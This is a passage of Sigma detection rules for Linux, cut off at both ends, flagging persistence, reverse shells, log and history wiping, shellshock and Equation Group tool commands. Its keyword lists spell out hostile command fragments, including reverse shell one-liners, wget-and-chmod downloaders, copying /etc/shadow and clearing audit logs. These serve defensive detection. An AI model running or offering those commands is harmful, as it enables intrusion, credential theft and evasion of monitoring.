    "path": "rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml",
    "content": "title: Modifying Crontab\nid: af202fd3-7bff-4212-a25a-fb34606cfcbe\nstatus: test\ndescription: Detects suspicious modification of crontab file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md\nauthor: Pawel Mazur\ndate: 2022-04-16\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.003\nlogsource:\n    product: linux\n    service: cron\ndetection:\n    keywords:\n        - 'REPLACE'\n    condition: keywords\nfalsepositives:\n    - Legitimate modification of crontab\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml",
    "content": "title: Guacamole Two Users Sharing Session Anomaly\nid: 1edd77db-0669-4fef-9598-165bda82826d\nstatus: test\ndescription: Detects suspicious session with two users present\nreferences:\n    - https://research.checkpoint.com/2020/apache-guacamole-rce/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-03\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1212\nlogsource:\n    product: linux\n    service: guacamole\ndetection:\n    selection:\n        - '(2 users now present)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_apt_equationgroup_lnx.yml",
    "content": "title: Equation Group Indicators\nid: 41e5c73d-9983-4b69-bd03-e13b67e9623c\nstatus: test\ndescription: Detects suspicious shell commands used in various Equation Group scripts and tools\nreferences:\n    - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-09\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.g0020\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # evolvingstrategy, elgingamble, estesfox\n        - 'chown root*chmod 4777 '\n        - 'cp /bin/sh .;chown'\n        # tmpwatch\n        - 'chmod 4777 /tmp/.scsi/dev/bin/gsh'\n        - 'chown root:root /tmp/.scsi/dev/bin/'\n        # estesfox\n        - 'chown root:root x;'\n        # ratload\n        - '/bin/telnet locip locport < /dev/console | /bin/sh'\n        - '/tmp/ratload'\n        # ewok\n        - 'ewok -t '\n        # xspy\n        - 'xspy -display '\n        # elatedmonkey\n        - 'cat > /dev/tcp/127.0.0.1/80 <<END'\n        # ftshell\n        - 'rm -f /current/tmp/ftshell.latest'\n        # ghost\n        - 'ghost_* -v '\n        # morerats client\n        - ' --wipe > /dev/null'\n        # noclient\n        - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'\n        - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'\n        # auditcleaner\n        - '> /var/log/audit/audit.log; rm -f .'\n        - 'cp /var/log/audit/audit.log .tmp'\n        # reverse shell\n        - 'sh >/dev/tcp/* <&1 2>&1'\n        # packrat\n        - 'ncat -vv -l -p * <'\n        - 'nc -vv -l -p * <'\n        # empty bowl\n        - '< /dev/console | uudecode && uncompress'\n        - 'sendmail -osendmail;chmod +x sendmail'\n        # echowrecker\n        - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'\n        # dubmoat\n        - 'chmod 666 /var/run/utmp~'\n        # poptop\n        - 'chmod 700 nscd crond'\n        # abopscript\n        - 'cp /etc/shadow /tmp/.'\n        # ys\n        - '</dev/console |uudecode > /dev/null 2>&1 && uncompress'\n        # jacktelnet\n        - 'chmod 700 jp&&netstat -an|grep'\n        # others\n        - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'\n        - 'chmod 700 crond'\n        - 'wget http*; chmod +x /tmp/sendmail'\n        - 'chmod 700 fp sendmail pt'\n        - 'chmod 755 /usr/vmsys/bin/pipe'\n        - 'chmod -R 755 /usr/vmsys'\n        - 'chmod 755 $opbin/*tunnel'\n        - 'chmod 700 sendmail'\n        - 'chmod 0700 sendmail'\n        - '/usr/bin/wget http*sendmail;chmod +x sendmail;'\n        - '&& telnet * 2>&1 </dev/console'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_buffer_overflows.yml",
    "content": "title: Buffer Overflow Attempts\nid: 18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781\nstatus: test\ndescription: Detects buffer overflow attempts in Unix system log files\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml  # OSSEC attack detection rules&#8203;:contentReference[oaicite:6]{index=6}&#8203;:contentReference[oaicite:7]{index=7}\n    - https://docs.oracle.com/cd/E19683-01/816-4883/6mb2joatd/index.html  # Exec stack syslog message (noexec_user_stack)&#8203;:contentReference[oaicite:8]{index=8}\n    - https://www.giac.org/paper/gcih/266/review-ftp-protocol-cyber-defense-initiative/102802  # WU-FTPD exploit \"0bin0sh\" analysis&#8203;:contentReference[oaicite:9]{index=9}\n    - https://blu.org/mhonarc/discuss/2001/04/msg00285.php  # RPC.statd exploit attempt log example&#8203;:contentReference[oaicite:10]{index=10}\n    - https://rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/  # Stack smashing protector alert example&#8203;:contentReference[oaicite:11]{index=11}\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-01\nmodified: 2025-03-17\ntags:\n    - attack.t1068\n    - attack.privilege-escalation\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'attempt to execute code on stack by'\n        - '0bin0sh1'\n        # - 'rpc.statd[\\d+]: gethostbyname error for'  # it's an expensive regex and produces questionable results\n        - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  # this can cause false positives in Base64 encoded data\n        - 'stack smashing detected'\n    condition: keywords\nfalsepositives:\n    - Base64 encoded data in log entries\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_clear_syslog.yml",
    "content": "title: Commands to Clear or Remove the Syslog - Builtin\nid: e09eb557-96d2-4de9-ba2d-30f712a5afd3\nstatus: test\ndescription: Detects specific commands commonly used to remove or empty the syslog\nreferences:\n    - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-09-10\nmodified: 2022-11-26\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    product: linux\ndetection:\n    selection:\n        - 'rm /var/log/syslog'\n        - 'rm -r /var/log/syslog'\n        - 'rm -f /var/log/syslog'\n        - 'rm -rf /var/log/syslog'\n        - 'mv /var/log/syslog'\n        - ' >/var/log/syslog'\n        - ' > /var/log/syslog'\n    falsepositives:\n        - '/syslog.'\n    condition: selection and not falsepositives\nfalsepositives:\n    - Log rotation\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_file_copy.yml",
    "content": "title: Remote File Copy\nid: 7a14080d-a048-4de8-ae58-604ce58a795b\nstatus: stable\ndescription: Detects the use of tools that copy files from or to remote systems\nreferences:\n    - https://www.cisa.gov/stopransomware/ransomware-guide\nauthor: Ömer Günal\ndate: 2020-06-18\ntags:\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1105\nlogsource:\n    product: linux\ndetection:\n    tools:\n        - 'scp '\n        - 'rsync '\n        - 'sftp '\n    filter:\n        - '@'\n        - ':'\n    condition: tools and filter\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/builtin/lnx_ldso_preload_injection.yml",
    "content": "title: Code Injection by ld.so Preload\nid: 7e3c4651-c347-40c4-b1d4-d48590fdf684\nstatus: test\ndescription: Detects the ld.so preload persistence file. See `man ld.so` for more information.\nreferences:\n    - https://man7.org/linux/man-pages/man8/ld.so.8.html\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-05-05\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.006\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - '/etc/ld.so.preload'\n    condition: keywords\nfalsepositives:\n    - Rare temporary workaround for library misconfiguration\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml",
    "content": "title: Potential Suspicious BPF Activity - Linux\nid: 0fadd880-6af3-4610-b1e5-008dc3a11b8a\nstatus: test\ndescription: Detects the presence of \"bpf_probe_write_user\" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.\nreferences:\n    - https://redcanary.com/blog/ebpf-malware/\n    - https://man7.org/linux/man-pages/man7/bpf-helpers.7.html\nauthor: Red Canary (idea), Nasreddine Bencherchali\ndate: 2023-01-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    product: linux\ndetection:\n    selection:\n        - 'bpf_probe_write_user'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_privileged_user_creation.yml",
    "content": "title: Privileged User Has Been Created\nid: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e\nstatus: test\ndescription: Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"\nreferences:\n    - https://digital.nhs.uk/cyber-alerts/2018/cc-2825\n    - https://linux.die.net/man/8/useradd\n    - https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid\nauthor: Pawel Mazur\ndate: 2022-12-21\nmodified: 2025-01-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1136.001\n    - attack.t1098\nlogsource:\n    product: linux\n    definition: '/var/log/secure on REHL systems or /var/log/auth.log on debian like Systems needs to be collected in order for this detection to work'\ndetection:\n    # Example of the events that could be observed when matching these would be as follow\n    #   Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash\n    #   Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash\n    #   Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash\n    #   Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash\n    selection_new_user:\n        - 'new user'\n    selection_uids_gids:\n        - 'GID=0,' # root group\n        - 'UID=0,' # root UID\n        - 'GID=10,' # wheel group\n        - 'GID=27,' # sudo group\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_clear_cmd_history.yml",
    "content": "title: Linux Command History Tampering\nid: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e\nstatus: test\ndescription: |\n    Detects commands that try to clear or tamper with the Linux command history.\n    This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as \"bash_history\" or \"zsh_history\".\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md\n    - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics\n    - https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/\nauthor: Patrick Bareiss\ndate: 2019-03-24\nmodified: 2024-04-17\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\n# Example config for this one (place it in .bash_profile):\n#  (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1  ]; then if  [ \"$is_empty\" = false ]; then logger -i -p local5.info -t empty_bash_history \"$USER : ~/.bash_history is empty \"; is_empty=true; fi; else is_empty=false;  fi;  done ) &\n#  It monitors the size of .bash_history and log the words \"empty_bash_history\" whenever a previously not empty bash_history becomes empty\n#  We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example)\n#  It has two advantages over the version suggested by Patrick Bareiss  :\n#    - it is not relative to the exact command used to clear .bash_history : for instance Caldera uses \"> .bash_history\" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities !\n#    - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'cat /dev/null >*sh_history'\n        - 'cat /dev/zero >*sh_history'\n        - 'chattr +i*sh_history'\n        - 'echo \"\" >*sh_history'\n        - 'empty_bash_history'\n        - 'export HISTFILESIZE=0'\n        - 'history -c'\n        - 'history -w'\n        - 'ln -sf /dev/null *sh_history'\n        - 'ln -sf /dev/zero *sh_history'\n        - 'rm *sh_history'\n        - 'shopt -ou history'\n        - 'shopt -uo history'\n        - 'shred *sh_history'\n        - 'truncate -s0 *sh_history'\n        # - 'unset HISTFILE'  # prone to false positives\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_susp_commands.yml",
    "content": "title: Suspicious Activity in Shell Commands\nid: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695\nstatus: test\ndescription: Detects suspicious shell commands used in various exploit codes (see references)\nreferences:\n    - https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html\n    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb\n    - http://pastebin.com/FtygZ1cg\n    - https://artkond.com/2017/03/23/pivoting-guide/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-21\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # Generic suspicious commands\n        - 'wget * - http* | perl'\n        - 'wget * - http* | sh'\n        - 'wget * - http* | bash'\n        - 'python -m SimpleHTTPServer'\n        - '-m http.server'      # Python 3\n        - 'import pty; pty.spawn*'\n        - 'socat exec:*'\n        - 'socat -O /tmp/*'\n        - 'socat tcp-connect*'\n        - '*echo binary >>*'\n        # Malware\n        - '*wget *; chmod +x*'\n        - '*wget *; chmod 777 *'\n        - '*cd /tmp || cd /var/run || cd /mnt*'\n        # Apache Struts in-the-wild exploit codes\n        - '*stop;service iptables stop;*'\n        - '*stop;SuSEfirewall2 stop;*'\n        - 'chmod 777 2020*'\n        - '*>>/etc/rc.local'\n        # Metasploit framework exploit codes\n        - '*base64 -d /tmp/*'\n        - '* | base64 -d *'\n        - '*/chmod u+s *'\n        - '*chmod +s /tmp/*'\n        - '*chmod u+s /tmp/*'\n        - '* /tmp/haxhax*'\n        - '* /tmp/ns_sploit*'\n        - 'nc -l -p *'\n        - 'cp /bin/ksh *'\n        - 'cp /bin/sh *'\n        - '* /tmp/*.b64 *'\n        - '*/tmp/ysocereal.jar*'\n        - '*/tmp/x *'\n        - '*; chmod +x /tmp/*'\n        - '*;chmod +x /tmp/*'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_susp_log_entries.yml",
    "content": "title: Suspicious Log Entries\nid: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1\nstatus: test\ndescription: Detects suspicious log entries in Linux log files\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-25\nmodified: 2021-11-27\ntags:\n    - attack.impact\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # Generic suspicious log lines\n        - 'entered promiscuous mode'\n        # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml\n        - 'Deactivating service'\n        - 'Oversized packet received from'\n        - 'imuxsock begins to drop messages'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_susp_rev_shells.yml",
    "content": "title: Suspicious Reverse Shell Command Line\nid: 738d9bcf-6999-4fdb-b4ac-3033037db8ab\nstatus: test\ndescription: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell\nreferences:\n    - https://alamot.github.io/reverse_shells/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-04-02\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'BEGIN {s = \"/inet/tcp/0/'\n        - 'bash -i >& /dev/tcp/'\n        - 'bash -i >& /dev/udp/'\n        - 'sh -i >$ /dev/udp/'\n        - 'sh -i >$ /dev/tcp/'\n        - '&& while read line 0<&5; do'\n        - '/bin/bash -c exec 5<>/dev/tcp/'\n        - '/bin/bash -c exec 5<>/dev/udp/'\n        - 'nc -e /bin/sh '\n        - '/bin/sh | nc'\n        - 'rm -f backpipe; mknod /tmp/backpipe p && nc '\n        - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i))))'\n        - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n        - '/bin/sh -i <&3 >&3 2>&3'\n        - 'uname -a; w; id; /bin/bash -i'\n        - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'\n        - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');'\n        - '.to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n        - ';while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print'\n        - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:'\n        - 'rm -f /tmp/p; mknod /tmp/p p &&'\n        - ' | /bin/bash | telnet '\n        - ',echo=0,raw tcp-listen:'\n        - 'nc -lvvp '\n        - 'xterm -display 1'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shellshock.yml",
    "content": "title: Shellshock Expression\nid: c67e0c98-4d39-46ee-8f6b-437ebf6b950e\nstatus: test\ndescription: Detects shellshock expressions in log files\nreferences:\n    - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-14\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - '(){:;};'\n        - '() {:;};'\n        - '() { :;};'\n        - '() { :; };'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_susp_dev_tcp.yml",
    "content": "title: Suspicious Use of /dev/tcp\nid: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c\nstatus: test\ndescription: Detects suspicious command with /dev/tcp\nreferences:\n    - https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/\n    - https://book.hacktricks.xyz/shells/shells/linux\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-01-06\ntags:\n    - attack.reconnaissance\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'cat </dev/tcp/'\n        - 'exec 3<>/dev/tcp/'\n        - 'echo >/dev/tcp/'\n        - 'bash -i >& /dev/tcp/'\n        - 'sh -i >& /dev/udp/'\n        - '0<&196;exec 196<>/dev/tcp/'\n        - 'exec 5<>/dev/tcp/'\n        - '(sh)0>/dev/tcp/'\n        - 'bash -c ''bash -i >& /dev/tcp/'\n        - 'echo -e ''#!/bin/bash\\nbash -i >& /dev/tcp/'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/lnx_susp_jexboss.yml",
    "content": "title: JexBoss Command Sequence\nid: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae\nstatus: test\ndescription: Detects suspicious command sequence that JexBoss\nreferences:\n    - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-24\nmodified: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        '|all':\n            - 'bash -c /bin/bash'\n            - '&/dev/tcp/'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_symlink_etc_passwd.yml",
    "content": "title: Symlink Etc Passwd\nid: c67fc22a-0be5-4b4f-aad5-2b32c4b69523\nstatus: test\ndescription: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd\nreferences:\n    - https://www.qualys.com/2021/05/04/21nails/21nails.txt\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-04-05\nmodified: 2021-11-27\ntags:\n    - attack.t1204.001\n    - attack.execution\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'ln -s -f /etc/passwd'\n        - 'ln -s /etc/passwd'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml",
    "content": "title: Suspicious OpenSSH Daemon Error\nid: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc\nstatus: test\ndescription: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts\nreferences:\n    - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-06-30\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: linux\n    service: sshd\ndetection:\n    keywords:\n        - 'unexpected internal error'\n        - 'unknown or unsupported key type'\n        - 'invalid certificate signing key'\n        - 'invalid elliptic curve value'\n        - 'incorrect signature'\n        - 'error in libcrypto'\n        - 'unexpected bytes remain after decoding'\n        - 'fatal: buffer_get_string: bad string'\n        - 'Local: crc32 compensation attack'\n        - 'bad client public DH value'\n        - 'Corrupted MAC on input'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml",
    "content": "title: Disabling Security Tools - Builtin\nid: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36\nrelated:\n    - id: e3a8a052-111f-4606-9aee-f28ebeb76776\n      type: derived\nstatus: test\ndescription: Detects disabling security tools\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-06-17\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    product: linux\n    service: syslog\ndetection:\n    keywords:\n        - 'stopping iptables'\n        - 'stopping ip6tables'\n        - 'stopping firewalld'\n        - 'stopping cbdaemon'\n        - 'stopping falcon-sensor'\n    condition: keywords\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/syslog/lnx_syslog_susp_named.yml",
    "content": "title: Suspicious Named Error\nid: c8e35e96-19ce-4f16-aeb6-fd5588dc5365\nstatus: test\ndescription: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-20\nmodified: 2022-10-05\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: linux\n    service: syslog\ndetection:\n    keywords:\n        - ' dropping source port zero packet from '\n        - ' denied AXFR from '\n        - ' exiting (due to fatal error)'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml",
    "content": "title: Suspicious VSFTPD Error Messages\nid: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe\nstatus: test\ndescription: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts\nreferences:\n    - https://github.com/dagwieers/vsftpd/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-07-05\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    product: linux\n    service: vsftpd\ndetection:\n    keywords:\n        - 'Connection refused: too many sessions for this address.'\n        - 'Connection refused: tcp_wrappers denial.'\n        - 'Bad HTTP verb.'\n        - 'port and pasv both active'\n        - 'pasv and port both active'\n        - 'Transfer done (but failed to open directory).'\n        - 'Could not set file modification time.'\n        - 'bug: pid active in ptrace_sandbox_free'\n        - 'PTRACE_SETOPTIONS failure'\n        - 'weird status:'\n        - 'couldn''t handle sandbox event'\n        - 'syscall * out of bounds'\n        - 'syscall not permitted:'\n        - 'syscall validate failed:'\n        - 'Input line too long.'\n        - 'poor buffer accounting in str_netfd_alloc'\n        - 'vsf_sysutil_read_loop'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_doas_conf_creation.yml",
    "content": "title: Linux Doas Conf File Creation\nid: 00eee2a5-fdb0-4746-a21d-e43fbdea5681\nstatus: stable\ndescription: Detects the creation of doas.conf file in linux host platform.\nreferences:\n    - https://research.splunk.com/endpoint/linux_doas_conf_file_creation/\n    - https://www.makeuseof.com/how-to-install-and-use-doas/\nauthor: Sittikorn S, Teoderick Contreras\ndate: 2022-01-20\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '/etc/doas.conf'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_persistence_cron_files.yml",
    "content": "title: Persistence Via Cron Files\nid: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05\nstatus: test\ndescription: Detects creation of cron file or files in Cron directories which could indicates potential persistence.\nreferences:\n    - https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC\ndate: 2021-10-15\nmodified: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.003\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection1:\n        TargetFilename|startswith:\n            - '/etc/cron.d/'\n            - '/etc/cron.daily/'\n            - '/etc/cron.hourly/'\n            - '/etc/cron.monthly/'\n            - '/etc/cron.weekly/'\n            - '/var/spool/cron/crontabs/'\n    selection2:\n        TargetFilename|contains:\n            - '/etc/cron.allow'\n            - '/etc/cron.deny'\n            - '/etc/crontab'\n    condition: 1 of selection*\nfalsepositives:\n    - Any legitimate cron file.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml",
    "content": "title: Persistence Via Sudoers Files\nid: ddb26b76-4447-4807-871f-1b035b2bfa5d\nstatus: test\ndescription: Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\nmodified: 2022-12-31\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.003\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|startswith: '/etc/sudoers.d/'\n    condition: selection\nfalsepositives:\n    - Creation of legitimate files in sudoers.d folder part of administrator work\nlevel: medium\n"
  },
  {
    "path": "rules/linux/file_event/file_event_lnx_susp_filename_with_embedded_base64_command.yml",
    "content": "title: Suspicious Filename with Embedded Base64 Commands\nid: 179b3686-6271-4d87-807d-17d843a8af73\nstatus: experimental\ndescription: |\n    Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.\n    These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.\nreferences:\n    - https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/\nauthor: '@kostastsale'\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - '{echo'\n            - '{base64,-d}'\n    condition: selection\nfalsepositives:\n    - Legitimate files with similar naming patterns (very unlikely).\nlevel: 